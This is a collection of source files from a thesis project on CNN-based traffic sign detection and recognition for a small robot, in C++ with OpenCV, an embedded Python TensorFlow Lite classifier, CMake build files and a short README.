//detector->detect(image, keypoints, Mat());\n \n static Mat mask = Mat::zeros(HEIGHT,WIDTH,CV_8U);\n mask(Rect(0,0,WIDTH,HEIGHT*0.8))=1;\n \n detector->detect(image, keypoints, mask);\n \n \n Mat image_keypoints = image.clone();\n \n //drawKeypoints(image, keypoints, image,Scalar(255,153,255), DrawMatchesFlags::DEFAULT );\n drawKeypoints(image, keypoints, image_keypoints,Scalar(255,153,255), DrawMatchesFlags::DEFAULT );\n \n vector<Point2f> points;\n KeyPoint::convert(keypoints, points, keypoint_indexes);\n \n static const int WINDOW_SIZE = 90;//32;\n static const int THRESHOLD = 5;//24;\n static const int STEP_SIZE = 16;\n \n // this can be optimised further\n int i,j;\n for(i=0; i<WIDTH-WINDOW_SIZE;i=i+STEP_SIZE) {\n for(j=0; j<HEIGHT-WINDOW_SIZE; j=j+STEP_SIZE) {\n int density = 0;\n \n //use iterator here instead\n for (Point2f p : points) {\n int x = (int) p.x;\n int y = (int) p.y;\n if( (i<x&&x<i+WINDOW_SIZE)&&(j<y&&y<j+WINDOW_SIZE)) density++;\n }\n if(density>THRESHOLD ) {\n ROI temp = ROI(i,j,WINDOW_SIZE,WINDOW_SIZE,density);\n rois.push_front(temp);\n }\n \n }\n }\n \n rois.sort(my_compare);\n \n KeyPoint::convert(keypoints, points, keypoint_indexes);\n \n \n\n LCDImage(rgb);\n \n \n \n /*\n std::vector<uchar> tmp_array(SIZE);\n tmp_array.assign(image_keypoints.data, image_keypoints.data + 3*image_keypoints.total());\n BYTE* img = &tmp_array[0];\n \n LCDImage(img);\n */\n \n return;\n}\n\nvoid showROIs(list<ROI>& rois) {\n list<ROI>::iterator it;\n for (it = rois.begin(); it != rois.end(); it++) {\n int x = it->x;\n int y = it->y;\n int xs = it->xs;\n int ys = it->ys;\n LCDArea(x,y,x+xs,y+ys,GREEN,0);\n }\n return;\n}\n\nvoid TSD_reporting(float td) {\n //printf(\"FPS: %f\\n\", 1/td);\n \n LCDSetPrintf(0,52, \"FPS (actual): %f\\n\", 1/td);\n LCDSetPrintf(1,52, \"FPS (limit): %d\\n\", FREQ1);\n \n}\n\nvoid NMSuppression(list<ROI>& rois) {\n /*\n 1. Get highest priority ROI\n 2. Remove all ROIs with high overlap to highest priority ROI\n 3. Repeat with next highest ROI until reach the end of the list\n note: list is already sorted by priority\n */\n \n static const float OVERLAP_THRESHOLD = 0.10; // was 0.05\n list<ROI>::iterator it1;\n for (it1 = rois.begin(); it1 != rois.end(); it1++) {\n list<ROI>::iterator it2;\n \n int area = (it1->xs)*(it1->ys);\n for (it2 = next(it1); it2 != rois.end(); it2++) {\n int x_overlap = max(0, min(it1->x+it1->xs, it2->x+it2->xs) - max(it1->x, it2->x));\n int y_overlap = max(0, min(it1->y+it1->ys, it2->y+it2->ys) - max(it1->y, it2->y));\n int overlapArea = x_overlap * y_overlap;\n \n if(overlapArea > OVERLAP_THRESHOLD*area) {\n it2 = rois.erase(it2);\n it2--;\n }\n }\n }\n return;\n}\n\nvoid trackDetections(list<ROI>& rois, list<Detection>& detections) {\n /*\n compare with existing detections and delete ROIs that have been classified before?\n */\n \n const static int DISTANCE_THRESHOLD = 35;\n list<Detection>::iterator it1;\n for (it1=detections.begin(); it1!=detections.end();it1++) {\n list<ROI>::iterator it2;\n for(it2=rois.begin();it2!=rois.end();it2++) {\n int it1_xc = it1->x + it1->xs/2;\n int it1_yc = it1->y + it1->ys/2;\n int it2_xc = it2->x + it2->xs/2;\n int it2_yc = it2->y + it2->ys/2;\n \n int dx = abs(it1_xc-it2_xc);\n int dy = abs(it1_yc-it2_yc);\n \n int dist = sqrt(dx*dx+dy*dy);\n \n //printf(\"dist = %d\\n\", dist);\n \n if(dist < DISTANCE_THRESHOLD) {\n // update location of detection\n \n const static int SIZE_OF_CLASSIFIER = 128;\n /*\n if(it2_xc-SIZE_OF_CLASSIFIER/2<0) it1.update_horizontals(0,SIZE_OF_CLASSIFIER);\n else if(x_c+SIZE_OF_CLASSIFIER/2>WIDTH) x_c = WIDTH-SIZE_OF_CLASSIFIER/2;\n if(y_c-SIZE_OF_CLASSIFIER/2<0) y_c = SIZE_OF_CLASSIFIER/2;\n else if(y_c+SIZE_OF_CLASSIFIER/2>HEIGHT) y_c = HEIGHT-SIZE_OF_CLASSIFIER/2;\n */\n if(it2_xc-SIZE_OF_CLASSIFIER/2<0) {\n it1->update_horizontals(0,SIZE_OF_CLASSIFIER);\n } else if(it2_xc+SIZE_OF_CLASSIFIER/2>WIDTH) {\n it1->update_horizontals(WIDTH-SIZE_OF_CLASSIFIER, SIZE_OF_CLASSIFIER);\n } else {\n it1->update_horizontals(it2_xc-SIZE_OF_CLASSIFIER/2,SIZE_OF_CLASSIFIER);\n }\n \n if(it2_yc-SIZE_OF_CLASSIFIER/2<0) {\n it1->update_verticals(0,SIZE_OF_CLASSIFIER);\n } else if(it2_yc+SIZE_OF_CLASSIFIER/2>HEIGHT) {\n it1->update_verticals(HEIGHT-SIZE_OF_CLASSIFIER, SIZE_OF_CLASSIFIER);\n } else {\n it1->update_verticals(it2_yc-SIZE_OF_CLASSIFIER/2,SIZE_OF_CLASSIFIER);\n }\n\n \n rois.erase(it2);\n break;\n }\n }\n \n // if it has reached this point, it cannot be tracked\n if(it2==rois.end()) {\n it1 = detections.erase(it1);\n it1--;\n }\n \n }\n return;\n}\n\nvoid show_detections(list<Detection>& detections) {\n list<Detection>::iterator it1;\n for (it1=detections.begin(); it1!=detections.end();it1++) {\n if(it1->object_class==0) continue;\n \n const static float X_M= 0.18;\n const static float X_C= -2.3;\n const static float Y_M= 0.06;\n const static float Y_C= 1.4;\n \n\n LCDArea(it1->x,it1->y,it1->x+it1->xs-1,it1->y+it1->ys-1,YELLOW,0);\n LCDSetPos(Y_M*it1->y+Y_C,X_M*it1->x+X_C);\n LCDPrintf(\"%s:%f\",labels[it1->object_class].c_str(),it1->confidence);\n }\n \n return;\n}\n\n\nvoid classification(list<ROI>& rois, list<Detection>& detections) {\n \n int index;\n double confidence;\n \n if(rois.empty()) return;\n ROI *roi = &rois.front();\n int x_c = roi->x + (roi->xs)/2;\n int y_c = roi->y + (roi->ys)/2;\n \n const static int SIZE_OF_CLASSIFIER = 128;\n x_c = min(WIDTH-SIZE_OF_CLASSIFIER/2,max(SIZE_OF_CLASSIFIER/2,x_c));\n y_c = min(HEIGHT-SIZE_OF_CLASSIFIER/2,max(SIZE_OF_CLASSIFIER/2,y_c));\n \n LCDArea(x_c-SIZE_OF_CLASSIFIER/2,y_c-SIZE_OF_CLASSIFIER/2,x_c+SIZE_OF_CLASSIFIER/2-1,y_c+SIZE_OF_CLASSIFIER/2-1,RED,0);\n \n \n Mat image = cv::Mat(HEIGHT,WIDTH, CV_8UC3, rgb);\n //Rect highest_priority(roi->x,roi->y,roi->xs,roi->ys);\n //Rect highest_priority(x_c - SIZE_OF_CLASSIFIER/2,y_c - SIZE_OF_CLASSIFIER/2 ,SIZE_OF_CLASSIFIER,SIZE_OF_CLASSIFIER);\n Rect highest_priority(x_c - SIZE_OF_CLASSIFIER/2,y_c - SIZE_OF_CLASSIFIER/2 ,SIZE_OF_CLASSIFIER,SIZE_OF_CLASSIFIER);\n cvtColor(image, image,CV_RGB2BGR);\n Mat tmp = image(highest_priority);\n Mat cropped;\n tmp.copyTo(cropped); // not using pointers\n \n \n \n \n \n //image.copyTo(cropped,highest_priority);\n\n /*\n namedWindow( \"Display window\", WINDOW_AUTOSIZE );\n imshow( \"Display window\", cropped );\n waitKey(0);\n */\n \n PyObject *pArgs = PyTuple_New(3);\n char *img_data = (char *)cropped.data;\n int len = SIZE_OF_CLASSIFIER*SIZE_OF_CLASSIFIER*3;\n PyObject *pValue1 = PyMemoryView_FromMemory(img_data,len,PyBUF_READ);\n if (!pValue1) {\n //printf(\"1\\n\");\n Py_XDECREF(pValue1);\n Py_DECREF(pArgs);\n Py_DECREF(pModule);\n fprintf(stderr, \"Cannot convert argument\\n\");\n return;\n }\n \n \n //printf(\"2\\n\");\n PyTuple_SetItem(pArgs, 0, pValue1);\n PyTuple_SetItem(pArgs, 1, PyLong_FromLong(128)); // set height\n PyTuple_SetItem(pArgs, 2, PyLong_FromLong(128)); // set width\n //printf(\"2.1\\n\");\n \n PyObject *pValue2 = PyObject_CallObject(pFunc, pArgs);\n //printf(\"here1\\n\");\n //printf(\"2.2\\n\");\n //Py_DECREF(pValue1);\n //Py_DECREF(pArgs);\n //printf(\"2.3\\n\");\n if (pValue2 != NULL) {\n //printf(\"3\\n\");\n //PyObject *pResult1 = PyTuple_GetItem(pValue2,0);\n //index = (uint) PyLong_AsLong(pResult1);\n //index = int (PyLong_AsLong(pResult1));\n index = int (PyLong_AsLong(PyTuple_GetItem(pValue2,0)));\n //printf(\"index=%i\",index);\n //PyObject *pResult2 = PyTuple_GetItem(pValue2,1);\n //confidence = PyFloat_AsDouble(pResult2);\n confidence =PyFloat_AsDouble(PyTuple_GetItem(pValue2,1));\n \n //printf(\"index = %i, confidence = %f\\n\", index, confidence);\n \n \n // fault is here\n //Py_XDECREF(pResult1);\n //Py_XDECREF(pResult2);\n Py_XDECREF(pValue2);\n }\n else {\n //printf(\"4\\n\");\n Py_XDECREF(pValue2);\n PyErr_Print();\n fprintf(stderr,\"Call failed\\n\");\n return;\n }\n \n \n \n //printf(\"5\\n\");\n \n Detection observed(index, confidence,x_c-SIZE_OF_CLASSIFIER/2,y_c-SIZE_OF_CLASSIFIER/2,SIZE_OF_CLASSIFIER,SIZE_OF_CLASSIFIER );\n \n //printf(\"6\\n\");\n \n detections.push_back(observed);\n //printf(\"\\nlabel: %s, confidence: %f\\n\", labels[index].c_str(), confidence);\n \n \n int train = 0;\n if(train==1) {\n char filename [50];\n snprintf(filename,50,\"images/%s/%s_%04d.jpg\", labels[index].c_str(), sessionID, num);\n std::string str(filename);\n //str = \"crossing/\" + EXTENSION;\n num++;\n \n imwrite(filename,cropped);\n \n }\n \n return;\n}\n\nvoid read_labels() {\n ifstream f;\n f.open(\"tf_files/labels.txt\");\n while(!f.eof()) {\n string s;\n getline(f,s);\n labels.push_back(s);\n //printf(\"%s\\n\", s.c_str());\n }\n f.close();\n return;\n}\n\nvoid traffic_sign_detection() {\n // to monitor CPU consumption\n static high_resolution_clock::time_point t1;\n t1 = high_resolution_clock::now();\n \n list<ROI> _ROIs;\n static list<Detection> detections;\n \n detectROIs(_ROIs);\n \n NMSuppression(_ROIs);\n //showROIs(_ROIs);\n trackDetections(_ROIs, detections);\n showROIs(_ROIs);\n classification(_ROIs, detections);\n \n show_detections(detections);\n \n //LCDImage(rgb);\n \n \n /*\n 1. detect ROIs (input: rgb image; output: list of ROIs\n 2. supress non-maximal ROIs\n 3. track existant detections\n 4. choose highest-priority ROI to classify\n 5. perform classification and return new detection\n 6. display detections\n */\n \n //printf(\"\\nHello, World!\\n\");\n \n static high_resolution_clock::time_point t2;\n t2 = high_resolution_clock::now();\n static float td;\n td = (duration_cast<duration<double> >(t2-t1)).count();\n \n \n //printf(\"number of detections: %d\\n\", detections.size());\n \n TSD_reporting(td);\n}\n\nint main ()\n{\n LCDSetPrintf(0,0, \"[PLEASE WAIT]\");\n char *app_name = (char *)\"EyeBot Traffic Sign Recognition and Detection\";\n Py_SetProgramName((wchar_t*)app_name);\n Py_Initialize();\n \n PyRun_SimpleString(\"import sys\");\n PyRun_SimpleString(\"sys.path.append(\\\"./scripts/\\\")\");\n \n PyObject *pName = PyUnicode_FromString(\"label\");\n pModule = PyImport_Import(pName);\n Py_DECREF(pName);\n \n if(pModule==NULL) {\n PyErr_Print();\n Py_DECREF(pModule);\n return -1;\n }\n \n \n pFunc = PyObject_GetAttrString(pModule, \"label\");\n if(!pFunc || !PyCallable_Check(pFunc)) {\n if (PyErr_Occurred()) PyErr_Print();\n Py_XDECREF(pFunc);\n Py_DECREF(pModule);\n return -1;\n }\n \n read_labels();\n //generateSessionID();\n \n printf(\"ALL GOOD AND LOADED! \\n\\n\\n\\n\\n\");\n \n \n CAMInit(RESOLUTION);\n LCDMenu(\"\",\"\",\"\",\"END\");\n \n while(1) {\n static high_resolution_clock::time_point tc;\n tc = high_resolution_clock::now();\n \n CAMGet(rgb);\n \n \n /* non-interupt timer 1 */\n static high_resolution_clock::time_point t1 = high_resolution_clock::now();\n static float td_1;\n td_1 = (duration_cast<duration<double> >(tc-t1)).count();\n if( 1000/FREQ1 < 1000*td_1) {\n traffic_sign_detection();\n t1 = high_resolution_clock::now();\n }\n \n /* io */\n static int key;\n key = KEYRead();\n if(key == KEY4) break;\n \n OSWait(100);\n }\n \n //Py_XDECREF(pFunc);\n //Py_DECREF(pModule);\n \n /*\n if (Py_FinalizeEx() < 0) {\n return 1;\n }\n */\n \n CAMRelease();\n return 0;\n}\n" }, { "alpha_fraction": 0.6712328791618347, "alphanum_fraction": 0.7114449739456177, "avg_line_length": 44.2599983215332, "blob_id": "7a0e6775a2b4abb608e7ee4cc3110aeb8e02bc25", "content_id": "a320061c45ee0043c713df968060fe1f2f6c1945", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2263, "license_type": "no_license", "max_line_length": 174, "num_lines": 50, "path": "/LEGACY/fromRobot/ORB_DETECTION-build/scripts/init.py", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "import sys\n\n# this is to ensure that everything will be able to work for MAC\n# note for future reference if google.protobuf issue: the __init__.py file is missing in site-packages/google directory. creating an empty __init__.py file there should work\n\nsys.path.append(\"/usr/local/Cellar/python@2/2.7.16/Frameworks/Python.framework/Versions/2.7/lib/python27.zip\")\nsys.path.append(\"/usr/local/Cellar/python@2/2.7.16/Frameworks/Python.framework/Versions/2.7/lib/python2.7\")\nsys.path.append(\"/usr/local/Cellar/python@2/2.7.16/Frameworks/Python.framework/Versions/2.7/lib/python2.7/plat-darwin\")\nsys.path.append(\"/usr/local/Cellar/python@2/2.7.16/Frameworks/Python.framework/Versions/2.7/lib/python2.7/plat-mac\")\nsys.path.append(\"/usr/local/Cellar/python@2/2.7.16/Frameworks/Python.framework/Versions/2.7/lib/python2.7/plat-mac/lib-scriptpackages\")\nsys.path.append(\"/usr/local/Cellar/python@2/2.7.16/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-tk\")\nsys.path.append(\"/usr/local/Cellar/python@2/2.7.16/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-old\")\nsys.path.append(\"/usr/local/Cellar/python@2/2.7.16/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload\")\nsys.path.append(\"/Users/Jordan/Library/Python/2.7/lib/python/site-packages\")\nsys.path.append(\"/usr/local/lib/python2.7/site-packages\")\nsys.path.append(\"/usr/local/Cellar/numpy/1.16.3/libexec/nose/lib/python2.7/site-packages\")\n\n\n# -----------------------------------\n# added\n# -----------------------------------\n\nimport numpy as np\nimport tensorflow as tf\nimport time\nimport cv2\n\ndef load_labels(label_file):\n label = []\n proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()\n for l in proto_as_ascii_lines:\n label.append(l.rstrip())\n return label\n\nif __name__ == '__main__':\n tf.enable_eager_execution()\n model_path = \"tf_files/graph.lite\"\n \n # Load TFLite model and allocate tensors.\n interpreter = tf.lite.Interpreter(model_path=model_path)\n interpreter.allocate_tensors()\n \n # Get input and output tensors.\n input_details = interpreter.get_input_details()\n output_details = interpreter.get_output_details()\n \n input_mean = 127.5\n input_std = 127.5\n\n labels = load_labels(\"tf_files/labels.txt\")\n" }, { "alpha_fraction": 0.7882353067398071, "alphanum_fraction": 0.8058823347091675, "avg_line_length": 33, "blob_id": "8e43c66dc3f2cf7e9c5ce4b4bbe780dc1ab7e5e4", "content_id": "90fe17485af39f847df900d7823ba2e6d49b670b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 340, "license_type": "no_license", "max_line_length": 78, "num_lines": 10, "path": "/README.md", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "# TrafficSigns\nMPE Thesis Project: CNN-based Traffic Sign Recognition with Detection\n\nUse TensorFlow binary from \nhttps://github.com/PINTO0309/Tensorflow-bin\nin order to ensure that the TF Lite module is functional on the Raspberry Pi. \n\nCode has been written for OpenCV3 and Tensorflow 2. \n\nI highly recommend Keras for training purposes.\n" }, { "alpha_fraction": 0.7516447305679321, "alphanum_fraction": 0.7680920958518982, "avg_line_length": 32.77777862548828, "blob_id": "57c8cb73d747b329cb18527e47f5e2ba9ceff1a6", "content_id": "6af59bbe86917d943ceea49a9769ffd6ee4c621f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 608, "license_type": "no_license", "max_line_length": 92, "num_lines": 18, "path": "/LEGACY/fromRobot/ORB_DETECTION-build/scripts/tflite_converter.py", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "import tensorflow as tf\n\ngraph_file = 'retrained_graph.pb'\ninput_array = [\"input\"]\noutput_array = [\"final_result\"]\n\nsess = tf.compat.v1.Session\n\nconverter = tf.lite.TFLiteConverter.from_frozen_graph(graph_file, input_array, output_array)\nconverter.inference_type = tf.float32\n\n#converter.inference_input_type = tf.float32#tf.uint8\n#converter.inference_output_type = tf.float32\n#converter.optimizations = [tf.compat.v1.lite.Optimize.OPTIMIZE_FOR_LATENCY]\n#converter.optimizations = [tf.compat.v1.lite.Optimize.DEFAULT]\n\ntflite_model = converter.convert()\nopen(\"tf_files/graph.lite\", \"wb\").write(tflite_model)\n" }, { "alpha_fraction": 0.786867618560791, "alphanum_fraction": 0.7876749038696289, "avg_line_length": 51.33802795410156, "blob_id": "11d50c3df3229600b50ef82441183b8a2df6e178", "content_id": "d77807bc7c25703b3c65458bb969097d4ba9531c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 3716, "license_type": "no_license", "max_line_length": 167, "num_lines": 71, "path": "/clusterbased-build/CMakeFiles/TrafficSignRecognition.dir/DependInfo.cmake", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "# The set of languages for which implicit dependencies are needed:\nset(CMAKE_DEPENDS_LANGUAGES\n \"CXX\"\n )\n# The set of files for implicit dependencies of each language:\nset(CMAKE_DEPENDS_CHECK_CXX\n \"/Users/Jordan/Desktop/Thesis/October/clusterbased/tsr.cpp\" \"/Users/Jordan/Desktop/Thesis/October/clusterbased-build/CMakeFiles/TrafficSignRecognition.dir/tsr.cpp.o\"\n )\nset(CMAKE_CXX_COMPILER_ID \"Clang\")\n\n# The include file search paths:\nset(CMAKE_CXX_TARGET_INCLUDE_PATH\n \"/Users/Jordan/opencv/build\"\n \"/Users/Jordan/opencv/opencv/include\"\n \"/Users/Jordan/opencv/opencv/modules/core/include\"\n \"/Users/Jordan/opencv/opencv/modules/flann/include\"\n \"/Users/Jordan/opencv/opencv/modules/imgproc/include\"\n \"/Users/Jordan/opencv/opencv/modules/ml/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/phase_unwrapping/include\"\n \"/Users/Jordan/opencv/opencv/modules/photo/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/plot/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/quality/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/reg/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/surface_matching/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/xphoto/include\"\n \"/Users/Jordan/opencv/opencv/modules/dnn/include\"\n \"/Users/Jordan/opencv/opencv/modules/features2d/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/freetype/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/fuzzy/include\"\n \"/Users/Jordan/opencv/opencv/modules/gapi/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/hfs/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/img_hash/include\"\n \"/Users/Jordan/opencv/opencv/modules/imgcodecs/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/line_descriptor/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/saliency/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/text/include\"\n \"/Users/Jordan/opencv/opencv/modules/videoio/include\"\n \"/Users/Jordan/opencv/opencv/modules/calib3d/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/datasets/include\"\n \"/Users/Jordan/opencv/opencv/modules/highgui/include\"\n \"/Users/Jordan/opencv/opencv/modules/objdetect/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/rgbd/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/shape/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/structured_light/include\"\n \"/Users/Jordan/opencv/opencv/modules/ts/include\"\n \"/Users/Jordan/opencv/opencv/modules/video/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/videostab/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/xfeatures2d/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/ximgproc/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/xobjdetect/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/aruco/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/bgsegm/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/bioinspired/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/ccalib/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/dnn_objdetect/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/dpm/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/face/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/optflow/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/sfm/include\"\n \"/Users/Jordan/opencv/opencv/modules/stitching/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/superres/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/tracking/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/stereo/include\"\n )\n\n# Targets to which this target links.\nset(CMAKE_TARGET_LINKED_INFO_FILES\n )\n\n# Fortran module output directory.\nset(CMAKE_Fortran_TARGET_MODULE_DIR \"\")\n" }, { "alpha_fraction": 0.42041313648223877, "alphanum_fraction": 0.42041313648223877, "avg_line_length": 24.323076248168945, "blob_id": "509b9aea38436d014637a870e635d607c120829e", "content_id": "26de1d0740d1afd125e585516862bfff44029368", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1646, "license_type": "no_license", "max_line_length": 87, "num_lines": 65, "path": "/LEGACY/fromRobot/ORB_DETECTION/TSDR.cpp", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "namespace TSDR\n{\n class ROI {\n public:\n int x, y; // x, y coords of top left corner\n int xs, ys; // width, height respectively\n int priority;\n \n ROI (int x, int y, int xs, int ys) {\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n }\n \n ROI (int x, int y, int xs, int ys, int priority) {\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n this->priority = priority;\n }\n };\n \n class Detection {\n public:\n int object_class;\n double confidence;\n int x,y; // x,y coords of top left corner\n int xs,ys; // width, height respectively\n \n Detection (int object_class, double confidence, int x, int y, int xs, int ys) {\n this->object_class = object_class;\n this->confidence = confidence;\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n }\n \n void setPosition(int x, int y) {\n this->x = x;\n this->y = y;\n }\n \n void update_horizontals(int x, int xs) {\n this->x = x;\n this->xs = xs;\n }\n \n void update_verticals(int y, int ys) {\n this->y = y;\n this->ys = ys;\n }\n \n void setDimensions(int xs, int ys) {\n this->xs = xs;\n this->ys = ys;\n }\n \n void updateConfidence (double confidence) {\n this->confidence = confidence;\n }\n };\n}\n" }, { "alpha_fraction": 0.7225000262260437, "alphanum_fraction": 0.7524999976158142, "avg_line_length": 87.88888549804688, "blob_id": "fbea24f9f3892b507c3f17965b89bda1b33287f2", "content_id": "3d35d72a1948d63ab4325e57c990dd9190884c4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 800, "license_type": "no_license", "max_line_length": 385, "num_lines": 9, "path": "/ROBOT COMPATIBILITY FILES/CMakeLists.txt", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "cmake_minimum_required(VERSION 2.8)\nset(OpenCV_DIR /usr/local/opt/opencv@2/share/OpenCV)\nproject( keypoints )\nfind_package( OpenCV REQUIRED )\ninclude_directories( ${OpenCV_INCLUDE_DIRS} /usr/local/include -I /usr/X11/include)\nLINK_DIRECTORIES (/usr/local/lib /usr/X11/lib /home/pi/eyebot/lib)\nset (CMAKE_CXX_FLAGS \"-L/usr/lib/python3.5/config-3.5m-arm-linux-gnueabihf -L/usr/lib -lpython3.5m -lpthread -ldl -lutil -lm -I/usr/include/python3.5m -I/usr/include/python3.5m -Xlinker -export-dynamic -Wl,-O1 -Wl,-Bsymbolic-functions -g -pedantic -Wall -lX11 -lpython2.7 -I/home/pi/eyebot/include -L/home/pi/eyebot/lib -lwiringPi -lX11 -pthread -llirc_client -lm -leyebot -lstdc++\")\nadd_executable( detector.demo detector.cpp TSDR.cpp)\ntarget_link_libraries( detector.demo ${OpenCV_LIBS} libeyebot.a)\n" }, { "alpha_fraction": 0.5888468623161316, "alphanum_fraction": 0.5964083075523376, "avg_line_length": 28.38888931274414, "blob_id": "b17a4355dc78fe075faa13ea0ea80db45970f410", "content_id": "dcd035a76ca405865caf4dd557cd4a3dd42a6aac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1058, "license_type": "no_license", "max_line_length": 103, "num_lines": 36, "path": "/clusterbased/version checking.cpp", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "#include <Python.h>\n#include <stdio.h>\n#include <opencv2/opencv.hpp>\nusing namespace cv;\nusing namespace std;\nint main(int argc, char** argv )\n{\n //PyRun_SimpleString(\"import sys\");\n char *app_name = (char *)\"SIFT-like Keypoint Cluster-based Traffic Sign Recognition and Detection\";\n Py_SetProgramName((wchar_t*)app_name);\n Py_Initialize();\n PyRun_SimpleString(\"import sys\");\n PyRun_SimpleString(\"print (sys.version)\");\n \n cout << \"OpenCV version : \" << CV_VERSION << endl;\n cout << \"Major version : \" << CV_MAJOR_VERSION << endl;\n cout << \"Minor version : \" << CV_MINOR_VERSION << endl;\n cout << \"Subminor version : \" << CV_SUBMINOR_VERSION << endl;\n \n if ( argc != 2 )\n {\n printf(\"usage: DisplayImage.out <Image_Path>\\n\");\n return -1;\n }\n Mat image;\n image = imread( argv[1], 1 );\n if ( !image.data )\n {\n printf(\"No image data \\n\");\n return -1;\n }\n namedWindow(\"Display Image\", WINDOW_AUTOSIZE );\n imshow(\"Display Image\", image);\n waitKey(0);\n return 0;\n}\n" }, { "alpha_fraction": 0.7545564770698547, "alphanum_fraction": 0.7825030088424683, "avg_line_length": 81.4000015258789, "blob_id": "ed6170950913f34a812918bd100eb022c944000b", "content_id": "5d7bb591e4da07ef865ecf7b019c22c293221176", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 823, "license_type": "no_license", "max_line_length": 444, "num_lines": 10, "path": "/clusterbased/CMakeLists.txt", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "cmake_minimum_required(VERSION 2.8)\nproject( TrafficSignRecognition )\n#SET(CMAKE_CXX_COMPILER /usr/bin/g++)\nset(OpenCV_DIR /Users/Jordan/opencv/build)\nfind_package( OpenCV REQUIRED )\ninclude_directories( ${OpenCV_INCLUDE_DIRS} )\nLINK_DIRECTORIES (/usr/local/lib)\nset (CMAKE_CXX_FLAGS \"-std=c++11 -I/usr/local/include -I/usr/X11/include -leyesim -I/Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m -I/Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m -fno-strict-aliasing -Wsign-compare -fno-common -dynamic -DNDEBUG -g -fwrapv -O3 -Wall -g -L/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/config-3.7m-darwin -lpython3.7m -ldl -framework CoreFoundation\")\nadd_executable( TrafficSignRecognition tsr.cpp )\ntarget_link_libraries( TrafficSignRecognition ${OpenCV_LIBS} )" }, { "alpha_fraction": 0.7162162065505981, "alphanum_fraction": 0.7207207083702087, "avg_line_length": 19.18181800842285, "blob_id": "e1fa03ae5d6e7cb9d695f62fcbc0122080371738", "content_id": "507d130d02ca540465f82170971141d1e4679c0e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 222, "license_type": "no_license", "max_line_length": 29, "num_lines": 11, "path": "/ROBOT COMPATIBILITY FILES/includes.cpp", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "#include <opencv2/opencv.hpp>\n#include \"eyebot++.h\"\n#include <Python.h>\n#include <string>\n#include <chrono>\n#include <stdio.h>\n#include <vector>\n#include <algorithm>\n#include <cmath>\n#include <iostream>\n#include <fstream>\n" } ]
18
algoritmos-2019-2/clase-1-NancyEscamilla
https://github.com/algoritmos-2019-2/clase-1-NancyEscamilla
e7acc8844ea3ed46ef3541d288f33483f3e7d1b1
7af94c7a9888358311b86b8c11b610deaeb54b7f
9cf6fdce6229e1477ea78711e0833a58d3299b85
refs/heads/master
2020-04-19T20:04:05.793367
2019-03-27T19:13:16
2019-03-27T19:13:16
168,405,069
0
0
null
null
null
null
null
